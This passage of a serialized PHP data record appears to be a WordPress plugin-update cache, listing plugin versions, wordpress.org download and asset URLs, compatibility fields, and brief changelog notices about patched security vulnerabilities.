w.org/one-click-demo-import/assets/banner-1544x500.png?rev=2506685\";s:2:\"1x\";s:76:\"https://ps.w.org/one-click-demo-import/assets/banner-772x250.png?rev=2506685\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:80:\"woocommerce-pdf-invoices-packing-slips/woocommerce-pdf-invoices-packingslips.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:52:\"w.org/plugins/woocommerce-pdf-invoices-packing-slips\";s:4:\"slug\";s:38:\"woocommerce-pdf-invoices-packing-slips\";s:6:\"plugin\";s:80:\"woocommerce-pdf-invoices-packing-slips/woocommerce-pdf-invoices-packingslips.php\";s:11:\"new_version\";s:6:\"5.14.0\";s:3:\"url\";s:69:\"https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/\";s:7:\"package\";s:88:\"https://downloads.wordpress.org/plugin/woocommerce-pdf-invoices-packing-slips.5.14.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:91:\"https://ps.w.org/woocommerce-pdf-invoices-packing-slips/assets/icon-256x256.png?rev=2189942\";s:2:\"1x\";s:91:\"https://ps.w.org/woocommerce-pdf-invoices-packing-slips/assets/icon-128x128.png?rev=2189942\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:94:\"https://ps.w.org/woocommerce-pdf-invoices-packing-slips/assets/banner-1544x500.png?rev=2189942\";s:2:\"1x\";s:93:\"https://ps.w.org/woocommerce-pdf-invoices-packing-slips/assets/banner-772x250.png?rev=2189942\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.4\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:1:{i:0;s:11:\"woocommerce\";}}s:57:\"perfect-woocommerce-brands/perfect-woocommerce-brands.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:40:\"w.org/plugins/perfect-woocommerce-brands\";s:4:\"slug\";s:26:\"perfect-woocommerce-brands\";s:6:\"plugin\";s:57:\"perfect-woocommerce-brands/perfect-woocommerce-brands.php\";s:11:\"new_version\";s:6:\"3.6.13\";s:3:\"url\";s:57:\"https://wordpress.org/plugins/perfect-woocommerce-brands/\";s:7:\"package\";s:76:\"https://downloads.wordpress.org/plugin/perfect-woocommerce-brands.3.6.13.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/perfect-woocommerce-brands/assets/icon-256x256.jpg?rev=2912506\";s:2:\"1x\";s:79:\"https://ps.w.org/perfect-woocommerce-brands/assets/icon-128x128.jpg?rev=2912506\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:82:\"https://ps.w.org/perfect-woocommerce-brands/assets/banner-1544x500.jpg?rev=2912506\";s:2:\"1x\";s:81:\"https://ps.w.org/perfect-woocommerce-brands/assets/banner-772x250.jpg?rev=2912506\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.7\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"5.6\";s:16:\"requires_plugins\";a:0:{}}s:29:\"shared-files/shared-files.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:26:\"w.org/plugins/shared-files\";s:4:\"slug\";s:12:\"shared-files\";s:6:\"plugin\";s:29:\"shared-files/shared-files.php\";s:11:\"new_version\";s:6:\"1.7.66\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/shared-files/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/shared-files.1.7.66.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:57:\"https://ps.w.org/shared-files/assets/icon.svg?rev=3126306\";s:3:\"svg\";s:57:\"https://ps.w.org/shared-files/assets/icon.svg?rev=3126306\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/shared-files/assets/banner-1544x500.png?rev=2818290\";s:2:\"1x\";s:67:\"https://ps.w.org/shared-files/assets/banner-772x250.png?rev=2818290\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.2\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}}s:42:\"simple-membership/simple-wp-membership.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:31:\"w.org/plugins/simple-membership\";s:4:\"slug\";s:17:\"simple-membership\";s:6:\"plugin\";s:42:\"simple-membership/simple-wp-membership.php\";s:11:\"new_version\";s:5:\"4.7.5\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/simple-membership/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/simple-membership.4.7.5.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/simple-membership/assets/icon-128x128.png?rev=974529\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:71:\"https://ps.w.org/simple-membership/assets/banner-772x250.jpg?rev=923517\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.0\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:21:\"bp-gifts/bp-gifts.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:22:\"w.org/plugins/bp-gifts\";s:4:\"slug\";s:8:\"bp-gifts\";s:6:\"plugin\";s:21:\"bp-gifts/bp-gifts.php\";s:11:\"new_version\";s:5:\"1.0.1\";s:3:\"url\";s:39:\"https://wordpress.org/plugins/bp-gifts/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/bp-gifts.1.0.1.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:52:\"https://s.w.org/plugins/geopattern-icon/bp-gifts.svg\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.6\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:25:\"tablepress/tablepress.php\";O:8:\"stdClass\":14:{s:2:\"id\";s:24:\"w.org/plugins/tablepress\";s:4:\"slug\";s:10:\"tablepress\";s:6:\"plugin\";s:25:\"tablepress/tablepress.php\";s:11:\"new_version\";s:5:\"3.3.2\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/tablepress/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/tablepress.3.3.2.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:55:\"https://ps.w.org/tablepress/assets/icon.svg?rev=3192944\";s:3:\"svg\";s:55:\"https://ps.w.org/tablepress/assets/icon.svg?rev=3192944\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/tablepress/assets/banner-1544x500.png?rev=3566781\";s:2:\"1x\";s:65:\"https://ps.w.org/tablepress/assets/banner-772x250.png?rev=3566781\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.7\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}s:14:\"upgrade_notice\";s:105:\"<p>This update is a security, maintenance, and compatibility release. Updating is highly recommended!</p>\";}s:54:\"wapppress-builds-android-app-for-website/wappPress.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:54:\"w.org/plugins/wapppress-builds-android-app-for-website\";s:4:\"slug\";s:40:\"wapppress-builds-android-app-for-website\";s:6:\"plugin\";s:54:\"wapppress-builds-android-app-for-website/wappPress.php\";s:11:\"new_version\";s:5:\"8.0.3\";s:3:\"url\";s:71:\"https://wordpress.org/plugins/wapppress-builds-android-app-for-website/\";s:7:\"package\";s:83:\"https://downloads.wordpress.org/plugin/wapppress-builds-android-app-for-website.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:93:\"https://ps.w.org/wapppress-builds-android-app-for-website/assets/icon-256x256.jpg?rev=1119572\";s:2:\"1x\";s:93:\"https://ps.w.org/wapppress-builds-android-app-for-website/assets/icon-128x128.jpg?rev=1119572\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:96:\"https://ps.w.org/wapppress-builds-android-app-for-website/assets/banner-1544x500.jpg?rev=2703373\";s:2:\"1x\";s:95:\"https://ps.w.org/wapppress-builds-android-app-for-website/assets/banner-772x250.jpg?rev=2703373\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.5\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:43:\"wc-frontend-manager/wc_frontend_manager.php\";O:8:\"stdClass\":14:{s:2:\"id\";s:33:\"w.org/plugins/wc-frontend-manager\";s:4:\"slug\";s:19:\"wc-frontend-manager\";s:6:\"plugin\";s:43:\"wc-frontend-manager/wc_frontend_manager.php\";s:11:\"new_version\";s:6:\"6.7.27\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/wc-frontend-manager/\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/plugin/wc-frontend-manager.6.7.27.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/wc-frontend-manager/assets/icon-256x256.jpg?rev=1800818\";s:2:\"1x\";s:72:\"https://ps.w.org/wc-frontend-manager/assets/icon-128x128.jpg?rev=1800818\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:74:\"https://ps.w.org/wc-frontend-manager/assets/banner-772x250.jpg?rev=2629436\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.4\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"5.6\";s:16:\"requires_plugins\";a:0:{}s:14:\"upgrade_notice\";s:89:\"<ul>\n<li>Enhance - PHP compatibility expanded: now supports versions 7.2–8.4</li>\n</ul>\";}s:57:\"wc-multivendor-marketplace/wc-multivendor-marketplace.php\";O:8:\"stdClass\":14:{s:2:\"id\";s:40:\"w.org/plugins/wc-multivendor-marketplace\";s:4:\"slug\";s:26:\"wc-multivendor-marketplace\";s:6:\"plugin\";s:57:\"wc-multivendor-marketplace/wc-multivendor-marketplace.php\";s:11:\"new_version\";s:5:\"3.7.3\";s:3:\"url\";s:57:\"https://wordpress.org/plugins/wc-multivendor-marketplace/\";s:7:\"package\";s:75:\"https://downloads.wordpress.org/plugin/wc-multivendor-marketplace.3.7.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/wc-multivendor-marketplace/assets/icon-256x256.gif?rev=2611991\";s:2:\"1x\";s:79:\"https://ps.w.org/wc-multivendor-marketplace/assets/icon-128x128.gif?rev=2628122\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:81:\"https://ps.w.org/wc-multivendor-marketplace/assets/banner-772x250.jpg?rev=1925332\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.4\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"5.6\";s:16:\"requires_plugins\";a:2:{i:0;s:11:\"woocommerce\";i:1;s:19:\"wc-frontend-manager\";}s:14:\"upgrade_notice\";s:204:\"<ul>\n<li>Security - Patched a SQL Injection vulnerability in the Reviews Dashboard.</li>\n<li>Security - Patched an unauthenticated SQL Injection vulnerability in the Store List Map integration.</li>\n</ul>\";}s:55:\"wc-multivendor-membership/wc-multivendor-membership.php\";O:8:\"stdClass\":14:{s:2:\"id\";s:39:\"w.org/plugins/wc-multivendor-membership\";s:4:\"slug\";s:25:\"wc-multivendor-membership\";s:6:\"plugin\";s:55:\"wc-multivendor-membership/wc-multivendor-membership.php\";s:11:\"new_version\";s:7:\"2.11.11\";s:3:\"url\";s:56:\"https://wordpress.org/plugins/wc-multivendor-membership/\";s:7:\"package\";s:76:\"https://downloads.wordpress.org/plugin/wc-multivendor-membership.2.11.11.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:78:\"https://ps.w.org/wc-multivendor-membership/assets/icon-256x256.jpg?rev=1804240\";s:2:\"1x\";s:78:\"https://ps.w.org/wc-multivendor-membership/assets/icon-128x128.jpg?rev=1804240\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:80:\"https://ps.w.org/wc-multivendor-membership/assets/banner-772x250.png?rev=2569708\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.4\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"5.6\";s:16:\"requires_plugins\";a:0:{}s:14:\"upgrade_notice\";s:242:\"<ul>\n<li>Fixed   - Broken Access Control vulnerability in PayPal IPN payment processing.</li>\n<li>Fixed   - Insecure Direct Object Reference (IDOR) to Limited Privilege Escalation via User Role Overwrite in membership AJAX actions.</li>\n</ul>\";}s:27:\"woocommerce/woocommerce.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:25:\"w.org/plugins/woocommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:6:\"plugin\";s:27:\"woocommerce/woocommerce.php\";s:11:\"new_version\";s:6:\"10.8.1\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/woocommerce/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/woocommerce.10.8.1.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:56:\"https://ps.w.org/woocommerce/assets/icon.svg?rev=3234504\";s:3:\"svg\";s:56:\"https://ps.w.org/woocommerce/assets/icon.svg?rev=3234504\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/woocommerce/assets/banner-1544x500.png?rev=3234504\";s:2:\"1x\";s:66:\"https://ps.w.org/woocommerce/assets/banner-772x250.png?rev=3234504\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.9\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:39:\"wp-file-manager/file_folder_manager.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:29:\"w.org/plugins/wp-file-manager\";s:4:\"slug\";s:15:\"wp-file-manager\";s:6:\"plugin\";s:39:\"wp-file-manager/file_folder_manager.php\";s:11:\"new_version\";s:5:\"8.0.4\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/wp-file-manager/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/wp-file-manager.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/wp-file-manager/assets/icon-128x128.png?rev=2491299\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/wp-file-manager/assets/banner-772x250.jpg?rev=2491299\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:5:\"5.2.4\";s:16:\"requires_plugins\";a:0:{}}s:24:\"wpforms-lite/wpforms.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:26:\"w.org/plugins/wpforms-lite\";s:4:\"slug\";s:12:\"wpforms-lite\";s:6:\"plugin\";s:24:\"wpforms-lite/wpforms.php\";s:11:\"new_version\";s:8:\"1.10.1.1\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/wpforms-lite/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/wpforms-lite.1.10.1.1.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:57:\"https://ps.w.org/wpforms-lite/assets/icon.svg?rev=3254748\";s:3:\"svg\";s:57:\"https://ps.w.org/wpforms-lite/assets/icon.svg?rev=3254748\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wpforms-lite/assets/banner-1544x500.png?rev=3091364\";s:2:\"1x\";s:67:\"https://ps.w.org/wpforms-lite/assets/banner-772x250.png?rev=3091364\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/wpforms-lite/assets/banner-1544x500-rtl.png?rev=3254748\";s:2:\"1x\";s:71:\"https://ps.w.org/wpforms-lite/assets/banner-772x250-rtl.png?rev=3254748\";}s:8:\"requires\";s:3:\"5.5\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.2\";s:16:\"requires_plugins\";a:0:{}}s:29:\"wp-mail-smtp/wp_mail_smtp.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:26:\"w.org/plugins/wp-mail-smtp\";s:4:\"slug\";s:12:\"wp-mail-smtp\";s:6:\"plugin\";s:29:\"wp-mail-smtp/wp_mail_smtp.php\";s:11:\"new_version\";s:5:\"4.8.0\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/wp-mail-smtp/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wp-mail-smtp.4.8.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wp-mail-smtp/assets/icon-256x256.png?rev=1755440\";s:2:\"1x\";s:65:\"https://ps.w.org/wp-mail-smtp/assets/icon-128x128.png?rev=1755440\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wp-mail-smtp/assets/banner-1544x500.png?rev=3206423\";s:2:\"1x\";s:67:\"https://ps.w.org/wp-mail-smtp/assets/banner-772x250.png?rev=3206423\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:39:\"yith-pre-order-for-woocommerce/init.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:44:\"w.org/plugins/yith-pre-order-for-woocommerce\";s:4:\"slug\";s:30:\"yith-pre-order-for-woocommerce\";s:6:\"plugin\";s:39:\"yith-pre-order-for-woocommerce/init.php\";s:11:\"new_version\";s:6:\"3.16.0\";s:3:\"url\";s:61:\"https://wordpress.org/plugins/yith-pre-order-for-woocommerce/\";s:7:\"package\";s:80:\"https://downloads.wordpress.org/plugin/yith-pre-order-for-woocommerce.3.16.0.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:75:\"https://ps.w.org/yith-pre-order-for-woocommerce/assets/icon.svg?rev=3307139\";s:3:\"svg\";s:75:\"https://ps.w.org/yith-pre-order-for-woocommerce/assets/icon.svg?rev=3307139\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:86:\"https://ps.w.org/yith-pre-order-for-woocommerce/assets/banner-1544x500.jpg?rev=3307139\";s:2:\"1x\";s:85:\"https://ps.w.org/yith-pre-order-for-woocommerce/assets/banner-772x250.jpg?rev=3307139\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.8\";s:6:\"tested\";s:3:\"7.0\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:1:{i:0;s:11:\"woocommerce\";}}s:22:\"zoho-mail/zohoMail.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:23:\"w.org/plugins/zoho-mail\";s:4:\"slug\";s:9:\"zoho-mail\";s:6:\"plugin\";s:22:\"zoho-mail/zohoMail.php\";s:11:\"new_version\";s:5:\"1.6.3\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/zoho-mail/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/zoho-mail.1.6.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/zoho-mail/assets/icon-256x256.png?rev=1922694\";s:2:\"1x\";s:62:\"https://ps.w.org/zoho-mail/assets/icon-128x128.png?rev=1922694\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/zoho-mail/assets/banner-1544x500.png?rev=3022847\";s:2:\"1x\";s:64:\"https://ps.w.org/zoho-mail/assets/banner-772x250.png?rev=3022847\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.8\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"5.6\";s:16:\"requires_plugins\";a:0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:13:{s:24:\"buddypress/bp-loader.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:24:\"w.org/plugins/buddypress\";s:4:\"slug\";s:10:\"buddypress\";s:6:\"plugin\";s:24:\"buddypress/bp-loader.php\";s:11:\"new_version\";s:6:\"14.4.0\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/buddypress/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/buddypress.14.4.0.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:54:\"https://ps.w.org/buddypress/assets/icon.svg?rev=977480\";s:3:\"svg\";s:54:\"https://ps.w.org/buddypress/assets/icon.svg?rev=977480\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/buddypress/assets/banner-1544x500.png?rev=1854372\";s:2:\"1x\";s:65:\"https://ps.w.org/buddypress/assets/banner-772x250.png?rev=1854372\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/buddypress/assets/banner-1544x500-rtl.png?rev=1854372\";s:2:\"1x\";s:69:\"https://ps.w.org/buddypress/assets/banner-772x250-rtl.png?rev=1854372\";}s:8:\"requires\";s:3:\"6.1\";}s:50:\"woocommerce-bulk-order-form/wc-bulk-order-form.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:41:\"w.org/plugins/woocommerce-bulk-order-form\";s:4:\"slug\";s:27:\"woocommerce-bulk-order-form\";s:6:\"plugin\";s:50:\"woocommerce-bulk-order-form/wc-bulk-order-form.php\";s:11:\"new_version\";s:5:\"3.7.2\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/woocommerce-bulk-order-form/\";s:7:\"package\";s:76:\"https://downloads.wordpress.org/plugin/woocommerce-bulk-order-form.3.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/woocommerce-bulk-order-form/assets/icon-256x256.png?rev=2190455\";s:2:\"1x\";s:80:\"https://ps.w.org/woocommerce-bulk-order-form/assets/icon-128x128.png?rev=2190455\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:82:\"https://ps.w.org/woocommerce-bulk-order-form/assets/banner-772x250.png?rev=2190455\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:48:\"chikkili-google-pay-for-woocommerce/chikkili.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:49:\"w.org/plugins/chikkili-google-pay-for-woocommerce\";s:4:\"slug\";s:35:\"chikkili-google-pay-for-woocommerce\";s:6:\"plugin\";s:48:\"chikkili-google-pay-for-woocommerce/chikkili.php\";s:11:\"new_version\";s:5:\"1.0.6\";s:3:\"url\";s:66:\"https://wordpress.org/plugins/chikkili-google-pay-for-woocommerce/\";s:7:\"package\";s:84:\"https://downloads.wordpress.org/plugin/chikkili-google-pay-for-woocommerce.1.0.6.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:86:\"https://s.w.org/plugins/geopattern-icon/chikkili-google-pay-for-woocommerce_a8c1f7.svg\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:90:\"https://ps.w.org/chikkili-google-pay-for-woocommerce/assets/banner-772x250.png?rev=2608214\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:83:\"custom-shipping-methods-for-woocommerce/custom-shipping-methods-for-woocommerce.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:53:\"w.org/plugins/custom-shipping-methods-for-woocommerce\";s:4:\"slug\";s:39:\"custom-shipping-methods-for-woocommerce\";s:6:\"plugin\";s:83:\"custom-shipping-methods-for-woocommerce/custom-shipping-methods-for-woocommerce.php\";s:11:\"new_version\";s:5:\"1.9.1\";s:3:\"url\";s:70:\"https://wordpress.org/plugins/custom-shipping-methods-for-woocommerce/\";s:7:\"package\";s:82:\"https://downloads.wordpress.org/plugin/custom-shipping-methods-for-woocommerce.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:92:\"https://ps.w.org/custom-shipping-methods-for-woocommerce/assets/icon-256x256.png?rev=1873544\";s:2:\"1x\";s:92:\"https://ps.w.org/custom-shipping-methods-for-woocommerce/assets/icon-128x128.png?rev=1873544\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:95:\"https://ps.w.org/custom-shipping-methods-for-woocommerce/assets/banner-1544x500.png?rev=2251660\";s:2:\"1x\";s:94:\"https://ps.w.org/custom-shipping-methods-for-woocommerce/assets/banner-772x250.png?rev=2251660\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.4\";}s:39:\"file-upload-types/file-upload-types.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:31:\"w.org/plugins/file-upload-types\";s:4:\"slug\";s:17:\"file-upload-types\";s:6:\"plugin\";s:39:\"file-upload-types/file-upload-types.php\";s:11:\"new_version\";s:5:\"1.5.0\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/file-upload-types/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/file-upload-types.1.5.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/file-upload-types/assets/icon-256x256.png?rev=3547680\";s:2:\"1x\";s:70:\"https://ps.w.org/file-upload-types/assets/icon-256x256.png?rev=3547680\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:72:\"https://ps.w.org/file-upload-types/assets/banner-772x250.png?rev=3547680\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";}s:9:\"hello.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/hello-dolly/assets/banner-1544x500.jpg?rev=2645582\";s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:40:\"wp-file-upload/wordpress_file_upload.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/wp-file-upload\";s:4:\"slug\";s:14:\"wp-file-upload\";s:6:\"plugin\";s:40:\"wp-file-upload/wordpress_file_upload.php\";s:11:\"new_version\";s:5:\"5.1.7\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/wp-file-upload/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/wp-file-upload.5.1.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/wp-file-upload/assets/icon-256x256.png?rev=3252590\";s:2:\"1x\";s:67:\"https://ps.w.org/wp-file-upload/assets/icon-128x128.png?rev=3252590\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/wp-file-upload/assets/banner-1544x500.png?rev=3252590\";s:2:\"1x\";s:69:\"https://ps.w.org/wp-file-upload/assets/banner-772x250.png?rev=3252590\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.0\";}s:86:\"login-with-mobile-number-for-woocommerce/login-with-mobile-number-for-wooocommerce.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:54:\"w.org/plugins/login-with-mobile-number-for-woocommerce\";s:4:\"slug\";s:40:\"login-with-mobile-number-for-woocommerce\";s:6:\"plugin\";s:86:\"login-with-mobile-number-for-woocommerce/login-with-mobile-number-for-wooocommerce.php\";s:11:\"new_version\";s:5:\"1.0.8\";s:3:\"url\";s:71:\"https://wordpress.org/plugins/login-with-mobile-number-for-woocommerce/\";s:7:\"package\";s:89:\"https://downloads.wordpress.org/plugin/login-with-mobile-number-for-woocommerce.1.0.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:93:\"https://ps.w.org/login-with-mobile-number-for-woocommerce/assets/Icon-256x256.png?rev=2472145\";s:2:\"1x\";s:93:\"https://ps.w.org/login-with-mobile-number-for-woocommerce/assets/Icon-256x256.png?rev=2472145\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:95:\"https://ps.w.org/login-with-mobile-number-for-woocommerce/assets/Banner-772x250.png?rev=2472145\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.0\";}s:52:\"razorpay-payment-button/razorpay-payment-buttons.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:37:\"w.org/plugins/razorpay-payment-button\";s:4:\"slug\";s:23:\"razorpay-payment-button\";s:6:\"plugin\";s:52:\"razorpay-payment-button/razorpay-payment-buttons.php\";s:11:\"new_version\";s:5:\"2.4.9\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/razorpay-payment-button/\";s:7:\"package\";s:72:\"https://downloads.wordpress.org/plugin/razorpay-payment-button.2.4.9.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/razorpay-payment-button/assets/icon-256x256.png?rev=2584808\";s:2:\"1x\";s:76:\"https://ps.w.org/razorpay-payment-button/assets/icon-256x256.png?rev=2584808\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/razorpay-payment-button/assets/banner-1544x500.png?rev=2594699\";s:2:\"1x\";s:78:\"https://ps.w.org/